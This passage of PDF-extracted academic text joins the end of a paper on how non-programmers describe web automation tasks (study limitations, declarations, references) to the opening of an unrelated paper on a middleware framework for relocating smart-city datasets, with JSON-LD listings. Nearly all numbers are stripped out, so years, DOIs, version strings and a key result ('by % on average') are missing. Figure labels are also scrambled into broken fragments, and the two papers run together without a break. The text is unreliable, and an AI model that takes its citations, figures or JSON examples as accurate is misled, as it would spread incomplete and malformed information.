contrast, suggests that rules, example, and rationales can be highly effective when used in combination. future eup systems should give end-users more flexibility to express their intent via multi-modality. support iterative refinement of programs. it is well known that end-users may not be able to provide complete information of the programs they want (lau, ). we observed that users would start with quick and brief description of task outlines, goals, or solutions that handle only a subset of the potential scenarios, and then iteratively refine it by adding more rules and examples. many pbe systems (gulwani, ) allow users to provide additional examples for disambiguation, and even suggest critical examples (mayer et al., ). support mixed-initiative interaction to disambiguate user intent. to guide non- programmers to explain essential information such as loops and variable referencing, our study employed conversational dialogue (as explained in ‘method’) between participants and the computer. for example, when participants gave incomplete statements (e.g., demonstration for the first item), the computer asked them for additional information (‘‘what would you like to do for the rest items?’’) or confirmation (e.g., ‘‘do you want to do the same for the rest items?’’). likewise, future eup tools should incorporate mixed-initiative interaction to help end-users express unambiguous statements; although it is an open-ended research question how the computer and end-users have mutual understanding. we made several simplifying assumptions that limit the scope of our findings. first, the computer followed three informal rules, which may not be specific enough to design lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. working a system. first, the computer did not follow a formal definition for its behavior and abilities. a formal set of rules would make the wizard-of-oz study stronger. second, participants could not see or test programs they were building, which is uncommon for any programming environment. the next step is to study similar questions with a fully interactive system that provides generated programs and test results. third, the three tasks do not represent a full spectrum of computational tasks. however, as with the first study, we believe that even this narrow analysis provides useful insights that could guide the design of a new webeup system. finally, future work should include a functioning system that presents and tests solutions that address the challenges and the implications of this study. conclusion this paper reports results from two user studies that help to better understand the needs and capabilities of web end-users. the first study, a semi-structured interview study, explores challenges that end-users daily experience, and identifies seven categories of enhancements that we believe would be helpful to be included in future eup tools. the second, a wizard- of-oz study, demonstrates how non-programmers explain common computational tasks and provides design ideas for more natural programming environments. finally future work should build an interactive research prototype based on the findings, and test with real end-users. additional information and declarations funding the authors received no funding for this work. competing interests benjamin bederson is an academic editor for peerj. author contributions • tak yeon lee conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • benjamin b. bederson reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): irbnet @ university of maryland college park (umcp), project id and title: [ - ] survey about web inefficiencies. project was declared exempt from irb review. data availability the following information was supplied regarding data availability: the raw data has been supplied supplemental information . lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references biermann aw, ballard bw, sigmon ah. . an experimental study of natural language programming. international journal of man-machine studies : – doi . /s - ( ) - . blackwell a, burnett m. . applying attention investment to end-user programming. in: proceedings of the ieee symposia on human centric computing languages and environments, . piscataway: ieee, – doi . /hcc. . . bogart c, burnett m, cypher a, scaffidi c. . end-user programming in the wild: a field study of co scripter scripts. in: ieee symposium on visual languages and human-centric computing, , vl/hcc . piscataway: ieee, – doi . /vlhcc. . . bolin m, webber m, rha p, wilson t, miller rc. . automation and cus- tomization of rendered web pages. in: uist’ . new york: acm, – doi . / . . braun v, clarke v. . using thematic analysis in psychology. qualitative research in psychology : – doi . / qp oa. cameron jm, churchill ef. . conversations in developer communities: a pre- liminary analysis of the yahoo! pipes community. in: proceedings of the fourth international conference on communities and technologies. new york: acm, – . cao j, rector k, park th, fleming sd, burnett m, wiedenbeck s. b. a debugging perspective on end-user mashup programming. in: ieee symposium on visual languages and human-centric computing (vl/hcc). piscataway: ieee, – doi . /vlhcc. . . cao j, riche y, wiedenbeck s, burnett m, grigoreanu v. a. end-user mashup programming: through the design lens. in: chi ’ . new york: acm, – doi . / . . cheema s, gulwani s, laviola j. . quickdraw: improving drawing expe- rience for geometric diagrams. in: chi ’ . new york: acm, – doi . / . . chia ph, yamamoto y, asokan n. . is this app safe? a large scale study on application permissions and risk signals. in: proceedings of the st interna- tional conference on world wide web. www ’ . new york: acm, – doi . / . . corritore cl, kracher b, wiedenbeck s. . on-line trust: concepts, evolving themes, a model. international journal of human-computer studies : – doi . /s - ( ) - . cypher a, dontcheva m, lau t, nichols j. . no code required: giving users tools to transform the web. san francisco: morgan kaufmann publishers inc. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /hcc. . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / qp oa http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. cypher a, halbert dc, kurlander d, lieberman h, maulsby d, myers ba, turransky a (eds.) . watch what i do: programming by demonstration. cambridge: mit press. ennals r, brewer e, garofalakis m, shadle m, gandhi p. . intel mash maker: join the web. sigmod record : – doi . / . . fischer g, giaccardi e. . meta-design: a framework for the future of end-user development. in: lieberman h, paternó f, wulf v, eds. end user development. netherlands: springer, – . goldstein dg, mcafee rp, suri s. . the cost of annoying ads. in: proceedings of the nd international conference on world wide web. www ’ . republic and canton of geneva: international world wide web conferences steering committee, – . gulwani s. . dimensions in program synthesis. in: ppdp’ . new york: acm, – doi . / . . gulwani s. . automating string processing in spreadsheets using input–output examples. sigplan notices : – doi . / . . hruschka dj, schwartz d, st john dc, picone-decaro e, jenkins ra, carey jw. . reliability in coding open-ended data: lessons learned from hiv behavioral research. field methods : – doi . / x . kandel s, paepcke a, hellerstein j, heer j. . wrangler: interactive visual specifi- cation of data transformation scripts. in: chi ’ . new york: acm, – doi . / . . ko aj, abraham r, beckwith l, blackwell a, burnett m, erwig m, scaffidi c, lawrance j, lieberman h, myers b, rosson mb, rothermel g, shaw m, wiedenbeck s. . the state of the art in end-user software engineering. acm computing surveys : – – : doi . / . . kuttal sk, sarma a, rothermel g. . history repeats itself more easily when you log it: versioning for mashups. in: ieee symposium on visual lan- guages and human-centric computing (vl/hcc). piscataway: ieee, – doi . /vlhcc. . . kuttal sk, sarma a, rothermel g. . on the benefits of providing versioning support for end users: an empirical study. acm transactions on computer-human interaction : : – : doi . / . lau t. . why pbd systems fail: lessons learned for usable ai. in: chi , april – april , , florence, italy. new york: acm,. le v, gulwani s, su z. . smartsynth: synthesizing smartphone automation scripts from natural language. in: mobisys ’ . new york: acm, – doi . / . . leshed g, haber em, matthews t, lau t. . coscripter: automating & sharing how-to knowledge in the enterprise. in: chi ’ . new york: acm, – doi . / . . lieberman h. . your wish is my command: programming by example. san francisco: morgan kaufmann. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / x http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. macías ja, fabio p. . customization of web applications through an intelligent environment exploiting logical interface descriptions. interacting with computers : – doi . /j.intcom. . . . mayer m, soares g, grechkin m, le v, marron m, polozov a, singh r, zorn b, gulwani s. . user interaction models for disambiguation in programming by example. in: th acm user interface software and technology symposium. new york: acm. miller la. . programming by non-programmers. international journal of man- machine studies : – doi . /s - ( ) - . miller la. . natural language programming: styles, strategies, and contrasts. ibm systems journal : – doi . /sj. . . miller rc, chou vh, bernstein m, little g, van kleek m, karger d, schraefel m. . inky: a sloppy command line for the web with rich visual feedback. in: proceedings of the st annual acm symposium on user interface software and technology. new york: acm, – . nichols j, lau t. . mobilization by demonstration: using traces to re-author existing web sites. in: iui ’ . new york: acm, – doi . / . . ott m, cardie c, hancock j. . estimating the prevalence of deception in online review communities. in: www ’ . new york: acm, – doi . / . . ott m, choi y, cardie c, hancock jt. . finding deceptive opinion spam by any stretch of the imagination. in: proceedings of the th annual meeting of the association for computational linguistics: human language technologies - volume . hlt ’ . stroudsburg: association for computational linguistics, – . pane jf, myers ba, ratanamahatana ca. . studying the language and structure in non-programmers’ solutions to programming problems. international journal of human-computer studies : – doi . /ijhc. . . rinard mc. . example-driven program synthesis for end-user programming: techni- cal perspective. communications of the acm : – doi . / . . rosson mb, ballin j, rode j. . who, what, and how: a survey of informal and professional web developers. in: ieee symposium on visual languages and human-centric computing. piscataway: ieee, – doi . /vlhcc. . . toomim m, drucker sm, dontcheva m, rahimi a, thomson b, landay ja. . attaching ui enhancements to websites with end users. in: chi ’ . new york: acm, – doi . / . . tuchinda r, szekely p, knoblock ca. . building data integration queries by demon- stration. in: iui ’ . new york: acm, – doi . / . . tuchinda r, szekely p, knoblock ca. . building mashups by example. in: iui ’ . new york: acm, – doi . / . . wong j, hong ji. . making mashups with marmite: towards end-user programming for the web. in: chi ’ . new york: acm, – doi . / . . lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /sj. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /ijhc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. wong j, hong j. . what do we ‘‘mashup" when we make mashups? in: proceedings of the th international workshop on end-user software engineering. weuse ’ . new york: acm, – doi . / . . yessenov k, tulsiani s, menon a, miller rc, gulwani s, lampson b, kalai a. . a colorful approach to text processing by example. in: uist’ . new york: acm, – doi . / . . zang n, rosson mb. . what’s in a mashup? and why? studying the percep- tions of web-active end users. in: ieee symposium on visual languages and human-centric computing, , vl/hcc . piscataway: ieee, – doi . /vlhcc. . . zang n, rosson mb. a. web-active users working with data. in: chi ’ extended abstracts on human factors in computing systems. chi ea’ . new york: acm, – doi . / . . zang n, rosson mb. b. playing with information: how end users think about and integrate dynamic data. in: ieee symposium on visual languages and human-centric computing, , vl/hcc . piscataway: ieee, – doi . /vlhcc. . . zang n, rosson mb, nasser v. . mashups: who? what? why? in: chi ea’ . new york: acm, – doi . / . . zimmerman j, rivard k, hargraves i, tomasic a, mohnkern k. . user-created forms as an effective method of human-agent communication. in: chi ’ . new york: acm, – doi . / . . lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /vlhcc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. submitted january accepted april published may corresponding author johannes m. schleicher, schleicher@dsg.tuwien.ac.at academic editor chee shin yeo additional information and declarations can be found on page doi . /peerj-cs. copyright schleicher et al. distributed under creative commons cc-by . open access modeling and management of usage- aware distributed datasets for global smart city application ecosystems johannes m. schleicher , michael vögler , christian inzinger and schahram dustdar distributed systems group, tu wien, vienna, austria software evolution & architecture lab, university of zürich, zürich, switzerland abstract the ever-growing amount of data produced by and in today’s smart cities offers significant potential for novel applications created by city stakeholders as well as third parties. current smart city application models mostly assume that data is exclusively managed by and bound to its original application and location. we argue that smart city data must not be constrained to such data silos so that future smart city applications can seamlessly access and integrate data from multiple sources across multiple cities. in this paper, we present a methodology and toolset to model available smart city data sources and enable efficient, distributed data access in smart city environments. we introduce a modeling abstraction to describe the structure and relevant properties, such as security and compliance constraints, of smart city data sources along with independently accessible subsets in a technology-agnostic way. based on this abstraction, we present a middleware toolset for efficient and seamless data access through autonomous relocation of relevant subsets of available data sources to improve quality of service for smart city applications based on a configurable mechanism. we evaluate our approach using a case study in the context of a distributed city infrastructure decision support system and show that selective relocation of data subsets can significantly reduce application response times. subjects distributed and parallel computing, software engineering keywords smart city application engineering, data management, data migration, quality of service introduction sparked by the rapid adoption of the smart city paradigm and fueled by the rise of the internet of things, today’s metropolises have become data behemoths. with every day that passes more and more areas of cities around the globe start accumulating and producing data. these areas cover building management, traffic and mobility systems, energy grids, water and pollution management, governance, social media, and many more. this plethora of heterogenous data about various aspects of a city represents a vital foundation for decision and planning processes in smart cities. the advent of more and more open data initiatives around the globe, covering cities like london (https://data.london.gov.uk/), vienna (https://open.wien.gv.at/site/open-data/), new york (https://nycopendata.socrata.com/), and many more underlines the importance of opening up data to the public to inspire and support novel applications. even though these initiatives are gaining momentum, how to cite this article schleicher et al. ( ), modeling and management of usage-aware distributed datasets for global smart city ap- plication ecosystems . peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:schleicher@dsg.tuwien.ac.at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://data.london.gov.uk/ https://open.wien.gv.at/site/open-data/ https://nycopendata.socrata.com/ http://dx.doi.org/ . /peerj-cs. they still only cover a fraction of the available data of a city, missing many vital sources, especially when it comes to more sensitive areas like building management, energy grids, or public transport guidance systems. currently, this data is mostly isolated and restricted to certain application areas, data centers, organizations, or only accessible in a specific city. this isolation creates data silos, which lead to transitive restrictions that apply to the models and applications that build upon them, confining them to their initial application domains. today’s smart cities however, represent heterogeneous, dynamic, and complex environments that rely on emerging interactions in order to operate effectively. these interactions are an essential element of smart city applications (schleicher et al., a) and not only important in an intracity context, but also a key element to enable the future internet of cities (schleicher et al., b), an interconnected system of systems that spans multiple cities around the globe. to pave the way for such applications we need to break up the traditional notion of data silos to enable ubiquitous access to the valuable data they contain. in the context of smart cities, an approach is required that respects the complexities of this domain, specifically the need to effectively describe a large variety of heterogenous data sources along with relevant subsets. additionally, it has to be able to capture important data set characteristics (e.g., size, update frequency, costs), respect essential security and compliance constraints, as well as ensure efficient and seamless data access. in this paper, we present smart distributed datasets (sdd), a methodology and framework to enable transparent and efficient distributed data access for data sources in smart city environments. we introduce a system model that provides a simple abstraction for the technology-agnostic description of data sources and their subsets with the ability to express varying data granularities and specific characteristics common in the smart city domain. based on this abstraction, we present the sdd framework, a middleware toolset that enables efficient and seamless data access for smart city applications by autonomously relocating relevant subsets of available data sources to improve quality of service (qos) based on a configurable mechanism that considers request latency, as well as costs for data transfer, storage, and updates. we provide a proof of concept implementation of the sdd framework and evaluate it using a case study in the context of a distributed city infrastructure decision support system. for this case, we show that selective relocation of data subsets using the sdd framework can significantly improve qos by reducing response times by % on average. the remainder of this paper is structured as follows. in ‘motivation’ we present a motivating scenario and identify the associated key requirements. we introduce the system model underlying sdd in ‘system model’ and present the sdd framework along with a detailed discussion of its components in ‘the sdd framework’. in ‘evaluation’ we evaluate our approach using a case study from the smart city domain. related work is discussed in ‘related work’, followed by a conclusion and outlook on future research in ‘conclusion’. motivation in this paper, we base our discussion on our recent smart city research within urbem (http://urbem.tuwien.ac.at), a research initiative of the city of vienna and tu wien. within schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://urbem.tuwien.ac.at http://dx.doi.org/ . /peerj-cs. energy management vertical mobility management vertical asset management vertical energy mobility asset energy management transport management asset management smart home offices & retail infrastructure cloud server !  "# $ d em and (c onsum ers) da ta la ye r ap pli ca tio n la ye r inf ra str uc tu re la ye r security & c om pliance design & development runtime environment processing & analysis infrastructure management configuration management storage & access operations management lifecycle management s m art c ity o perating s ystem a pplications p rovider tenant m anagem ent figure the smart city application ecosystem with the smart city operating system at its core. urbem, we proposed the smart city application ecosystem (scale) (schleicher et al., a) shown in fig. as a streamlined way for modeling, engineering, and operating future smart city applications based on a common abstraction, the smart city operating system (sos) (vögler et al., ). the aim of scale is to enable stakeholders, citizens, and practitioners in a smart city environment to build novel kinds of applications that can utilize the newfound capabilities emerging through the iot, as well as accessing the massive amounts of data emitted by the city in an efficient way. using scale, we created the urbem smart city application (usca) (schleicher et al., c), a holistic, interdisciplinary decision support system for the city of vienna and a number of key stakeholders. we argue that such applications will evolve to become composable, interchangeable abstractions of capabilities similar to the applications known from today’s smart phones, but on a much larger scale. this evolution in turn is an essential step towards the so-called internet of cities (schleicher et al., b), an open and dynamic market place where applications can seamlessly interact and be exchanged between cities around the globe. to enable these applications as well as this vital open exchange it is essential to provide means to expose and access data in an efficient, secure, and predictable way. currently, schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. most of the data in a smart city context is confined to certain application areas and stakeholder data centers within a specific city. open data initiatives around the globe, while crucial, still only expose a certain fraction of the available data, missing out on many important domains, especially when data is stored in legacy systems without openly accessible interfaces or underlies strict security and compliance constraints. this data lies dormant beyond its initial use case even though it could provide essential input for a wide range of smart city applications. the ability to benefit from incorporating new data sources as they evolve, for example to enhance decision support and planning, or to be applied to new cities or novel domains, is hindered by the inability of these applications to access the necessary data. developers of smart city applications, however, need to be able to utilize and integrate as much relevant data as possible to generate maximum user benefit as well as applicability in as many cities as possible. stakeholders on the other hand, as willing as they might be to expose this data, are mostly bound by the complex constraints of their specific environment. the dynamic, emergent nature of interactions in and between smart city applications means they are not a priori aware that their data sources might become valuable assets if made accessible. this leads to a problematic stalemate between practitioners and stakeholders in the smart city domain, hindering essential innovation and application. to overcome this impasse, a mechanism is required that enables flexible, stable, and efficient data access, while providing a simple and tailored way to make data sources available, which still respects security and compliance constraints. specifically, we identify the following requirements in the context of our domain: • the ability to describe data sources using an evolvable and technology-agnostic abstraction. • the ability to describe subsets of these data sources along with relevant characteristics in the context of security, compliance and costs (e.g., effort to generate, store, query, and update particular subsets or the underlying data source as a whole). • an efficient way to access this data in a transparent way, independent of geographic location while still improving qos. system model in order to address the previously outlined requirements, we need an abstraction to model and describe the relevant data entities in our domain. as foundation for said abstraction we use madcat (inzinger et al., ) and its extensions, which we introduced in smart fabric (schleicher et al., a). we presented an infrastructure agnostic deployment model with the following abstract concepts: technical units (tus) to describe applications as well as application components, infrastructure specifications (is) describe infrastructure resources, deployment units (dus) to describe how to deploy and tu on an is and an deployment instance (di) represented such an actual deployment. in this paper, we extend this model with the ability to describe and incorporate data entities from the smart city domain. specifically, we introduce the additional concepts of data units (daus) to model data sources as well as data instances (dais) to describe specific deployments of daus schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. deployment unit technical unit infrastructure specification deployment instance links to ..n links to links to ..n links to ..n data instance links to ..n data unit links to ..n links to links to ..n figure relations between technical unit, deployment unit, infrastructure specification and de- ployment instance including the newly introduced data unit and data instance. on certain dis, along with the ability to link tu to daus. additionally, we provide an implementation of the abstract concepts along with the proposed methodology extensions for the sdd framework. we again choose json-ld (http://json-ld.org/) as data format for our concept description as a simple, both human and machine readable, pragmatic, and extensible representation that also allows us to interlink the relevant concepts with each other. figure shows an overview of all concepts, including the relations of the newly introduced dau and dai (shown in blue) to the previously existing concepts deployment instance (di) and technical unit (tu). in the following, we discuss the introduced concepts in more detail. data unit daus describe data sources including its subsets. listing shows an example of such a dau for a buildings data source in the urbem domain. as json-ld document, a dau can start with a context to set up common namespaces. this is followed by the type attribute to identify the corresponding kind of abstraction in our model space. the next attribute is the name as urn to identify the unit, along with a version attribute enabling versioning and therefore evolvable daus. the creationdate and the lastupdate define when the unit description was initially created respectively last updated. the next section is metainformation about the described data source. it contains a type attribute that defines the type of the data source, types can be rest, soap, any database, streaming data schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://json-ld.org/ http://dx.doi.org/ . /peerj-cs. or file based. in our example listing it is used to describe a document oriented mongodb (https://www.mongodb.com/) based data source. the schema attribute can link to a corresponding schema, which based on the type and can be anything of the likes of a sql schema, json schema, wadl (https://www.w .org/submission/wadl/) or wsdl (https://www.w .org/tr/wsdl). the next attribute is securityconstraints and in the context of this section it is used to define who is allowed to access the unit file. a security constraint can be a link to an oauth (https://oauth.net/) authority, ldap distinguished name (dn) or any other corresponding authentication and authorization scheme. this is a vital element to ensure the compliance and security constraints of this domain can be met on any level of detail and is again used when describing specific facets of a data source. the last element in the metainformation section is the dataunits attribute, which allows to link a dau to other corresponding daus enabling the description of linked data sources. the next section views allows to express multiple facets of the data source enabling a fined grained level of control about its aspects. each view has a name attribute for identification as well a a link to express how to access it. in case of the our example this is a url to the corresponding rest resource. the next section within a view is the updatefrequency. it allows to express how often a view is being updated (period,times), how long such an update takes (updatetime) as well as how much of the resource this update represents (fraction). the size attribute gives an indication of the expected size of the view. this is followed by a securityconstraints attribute that again can be a set of links to a corresponding authentication or authorization scheme supporting the previously mentioned methods. in this section it is used to express security and compliance constraints for specific fractions of a data source, which allows for a fine very grained level of control. the last attribute in a view is the datainstances attribute, which links the view and its corresponding dau to one or more data instance (dai) by referencing their names. listing : data unit—structure { "@context": "http:// smartfabric.dsg.tuwien.ac.at", "@type": "dataunit", "name": "urn:buildings:vienna", "version": " . " "creationdate": " - - : : + ", "lastupdate": " - - : : + " "metainformation": { "type":"nosql:mongodb", "schema": "http://sdd.dsg.tuwien.ac.at/urbem/vienna/buildings", "securityconstraints":[{ "type":"ldap" "url":" . . . " "dn":"cn=buildings -vienna", ... }], "dataunits":[...] } "views":[{ "name":"urn:buildings:vienna:buildingblocks", schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.mongodb.com/ https://www.w .org/submission/wadl/ https://www.w .org/tr/wsdl https://oauth.net/ http://dx.doi.org/ . /peerj-cs. "link":"/ buildingblocks /", "updatefrequency":{ "period":"yearly", "times": " ", "fraction": " " "updatetime" : " " }, "size":" ", "securityconstraints":[...] "datainstances":[...] }, "name":"urn:buildings:vienna:buildings", "link":"/ buildings /", ...] } data instance a dai represents a specific deployment of a dau on a di. there can be multiple dais for a dau representing different deployed views, where a specific dai contains a subset of the views specified in the dau, i.e., dai ∈p(dau). a dai specifies context, type, name and version, as well as a dataunit to reference the corresponding dau. this if followed by creationdate and updatedate to define when the instance was created as well as last updated. the next attribute is deploymentinstance, which contains a di name and is used to link the dai to a corresponding di. finally, the metainformation element allows to store additional information about the specific data instance in an open key value format that can later be used by the framework components to support transfer decisions, examples would be accessfrequency of this specific dai or other non functional characteristics. listing : data instance—structure { "@context": "http:// smartfabric.dsg.tuwien.ac.at", "@type": "datainstance", "dataunit":"urn:buildings:vienna" "name": "urn:buildings:vienna:buildingblocks", "version":" . ", "creationdate":" - - : : + " "lastupdate":" - - : : + " "deploymentinstance":"citizeninformationsystem/dedicatedserver" "metainformation":{...} } for further information regarding the elements of a tu, du, di, is as well as dau and dai, we provide detailed example representations of all of them in the corresponding bitbucket repository (https://bitbucket.org/jomis/smartdata). the sdd framework in this section, we introduce the sdd framework for enabling usage-aware distributed datasets, to address the previously introduced requirements. we begin with a framework overview, followed by a detailed description of all framework components and conclude with a comprehensive description of our proof of concept implementation. schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/jomis/smartdata http://dx.doi.org/ . /peerj-cs. repository api sdd api sdd manager repository manager data unit repository data instance repository migration api migration manager sdd proxy update api update manager sdd proxy api analyzer api analyzer manager dependency api dependency manager security api security manager figure sdd framework overview. framework rationales the framework with an overview of its main components shown in fig. follows the microservice (newman, ) architecture paradigm. it consists of eight main components where each of these components represents a microservice. the components utilize both service based as well as message-oriented communication to exchange information. specifically, we distinguish three different queue types: an analyzer queue, a handler queue as well as an update queue, which will be explained in more detail in the context of the corresponding components. additionally, the framework utilizes the principle of confidence elasticity a concept we introduced and successfully applied in our previous work (schleicher et al. b; schleicher et al. a). in this framework we use the concept in the update manager and migration manager component to select a suitable migration respectively update strategy for a specific data source. each strategy is associated with a confidence value (c ∈r, ≤c ≤ ), with representing no certainty and representing absolute certainty about the produced result. this convention allows the framework to configure certain confidence intervals to augment the process of choosing an applicable strategy within these two components. these confidence intervals are provided as configuration elements for the framework. if schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the confidence thresholds are not met, the framework follows an escalation model to find the next strategy that is able to provide results with higher confidence until it reaches the point where human interaction is necessary to produce a satisfactory result. in the context of the migration and update manager components, this means if an migration or update of a data source cannot be performed with a satisfactory confidence the escalation model will prompt for human interaction to perform said migration or update. sdd proxy the sdd proxy acts as a transparent proxy between clients and data sources (dais). the proxy itself has two main responsibilities. first, it submits all incoming requests to a analyzer message queue before forwarding them to the requested data source. second, it listens to the handler message queue for potential redirections to be taken for a specific request. if the handler message queue contains a message for the current request, it is processed by the sdd proxy, the request in question is redirected to the new data source and the message gets removed from the handler queue. to avoid bottlenecks, there can be multiple proxies where each of them is being managed via the sdd proxy apis by the sdd manager. sdd manager the sdd manager acts as the central management component of the framework and provides the sdd api for overall framework control. to activate the framework a user invokes the sdd api with the following parameters: (i) a set of triggers as well as a (ii) confidence interval to configure the confidence elasticity of the framework. the sdd manager then starts the first sdd proxy and starts monitoring the average request rates as well as the utilization of the proxy via the sdd proxy api. if the sdd manager detects a potential bottleneck, it starts another proxy (additional ones if necessary based on the average request rate). the next task of the sdd manager is to submit the provided triggers to the analyzer manager, which uses them to invoke the corresponding request monitoring. a trigger is used in the analyzer to decide whether a request needs to be handled or not. triggers can, for example, be time based, size based or follow a customizable cost function and provide a threshold for triggering a handling action. the analyzer manager uses different pluggable analyzer strategies in correspondence with these submitted triggers to determine if a request needs to be processed. if this is the case, the analyzer manager invokes the migration manager via the migration api and provides the corresponding request including the results of its analysis. the migration manager is responsible for determining the potential migration strategies for the data resource in question. to achieve this it first contacts the dependency manager, which uses a dependency resolution mechanism to determine the corresponding dau for the dai being requested by the current request. the dependency manager in turn is tightly integrated with the security manager, which ensures all security constraints that are defined in the daus are satisfied before returning the results of the resolution. once the dependency resolution has provided the dau, it is analyzed by the migration manager. specifically, it checks the results provided by the analyzer manager like request time, data size or a respective cost function against schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sdd manager invoke(triggers,confidence interval) sdd proxy analyzer manager response analyzer facet response [no bottlenecks] start response compensation facet response [confidence satisfied] response storeanalyzerresults (containers,results) createcompensationtopic(container ids) response [confidence satisfied] response storecompensationresults (containers,results) autoassembly() autoassembly() alt startanalyzer(triggers) createanalyzertopic(container ids) figure sdd manager sequence diagram. the attributes of the specific view being requested. it analyzes the update frequency as well as update sizes to determine if a migration should be performed as well as to to determine the fitting migration strategy and to execute it if applicable. once the migration is finished the migration manager executes two tasks. first, it adds the request to the migrated data source to the handler queue including the new target (dai) after the migration. this in turn triggers the corresponding sdd proxies to execute a redirection. second, it registers the resource at the update manager, which in turn determines the fitting update strategy for the migrated data source to ensure that the data stays up to date. once these steps are successfully finished, the migration manager updates the dais and daus to reflect the changes caused by the migration via the repository manager. a corresponding sequence diagram illustrating this process is shown in fig. . analyzer manager the role of the analyzer manager is to determine if a request is a potential candidate for a migration. it watches the analyzer queue for requests that correspond to any of the previously provided triggers. a trigger is a threshold that matches an attribute that is the result of an analyzer strategy. analyzer strategies in turn are pluggable mechanisms that analyze a specific request based on the type of the request in question. basically, we distinguish three different types of strategies: time analyzers, which determine the response time for a specific request; size analyzers, which determine the size of a request and response; as well as frequency analyzers, which determine the frequency of a request to a certain source. additionally, there is also the ability to provide cost function analyzers, which allow to integrate arbitrary cost functions and enable a much greater analytical schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. flexibility. once a threshold is met, the analyzer manager submits the request in question including the results of the specific strategy to the migration manager. migration manager the migration manager is responsible for deciding if a data resource should be migrated based on the results of the analyzer manager. it is invoked via the migration api with a specific request augmented with the results from the corresponding analyzer strategy. the migration manager then forwards this request to the dependency manager, which first determines the dai that belongs to the requested data resource. based on this dai the dau is determined only if all security constraints are being met, which in turn is ensured by the security manager. the retrieved dau provides the foundation for deciding if a data source can and should be migrated. to achieve this, the migration manager relies on pluggable strategies that determine if a migration is feasible and possible. such a migration strategy receives the retrieved dau as well as the results from the analyzer manager. based on this it does two things: first, it determines if a migration is possible by checking the results of the analyzer manager (e.g., response time, average transfer size) against the updatefrequency elements of the dau as well as the constraints of the current infrastructure. if the result of this analysis leads to the conclusion that a migration is possible and feasible the migration strategy returns according results augmented with a confidence value. second, the migration strategy provides a method to execute the actual migration. the framework is flexible regarding the specific migration mechanism and regards this as the responsibility of the strategy itself. one possible variant is the utilization of the smart fabric framework (schleicher et al., a) since its provides an optimal foundation for infrastructure agnostic deployments (hence migrations) and supports the extended system model. in case of a smart fabric strategy the infrastructure specifications (is) are taken into account when deciding if a migration is feasible. this means the migration strategy can check which non functional characteristics apply and can incorporate them in the decision to migrate. additionally, the execution of said migration is started by issuing a transfer requests to the smart fabric framework. based on the previously introduced confidence elasticity mechanism the migration manager then executes the corresponding migration strategy or in case none is found relies on a human interaction to perform the migration. once the migration is finished, the migration manager creates new corresponding dais to reflect the migrations and updates the corresponding daus. futhermore, it publishes a message to the handler queue and by doings so prompts the sdd proxy to execute a redirection to the migrated data source. once this is done the migration manager ensures the migrated data source is updated by registering the dais at the update manager. update manager the role of the update manager is to ensure that migrated data sources stay up to date if the original source is changed. to enable this it relies on pluggable update strategies and we basically distinguish the following different types: simple copy strategies, which copy either a fraction or the entire data source; script update strategies, which apply a more complex update strategy based on a script (e.g., rsync, sql scripts); as well as streaming replication schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. strategies for continuous updates. these strategies again utilize the confidence elasticity mechanism by providing a confidence value. based on the initially provided confidence interval of the framework the escalation mechanism selects an applicable update strategy or in the case none is found relies on a human interaction to perform 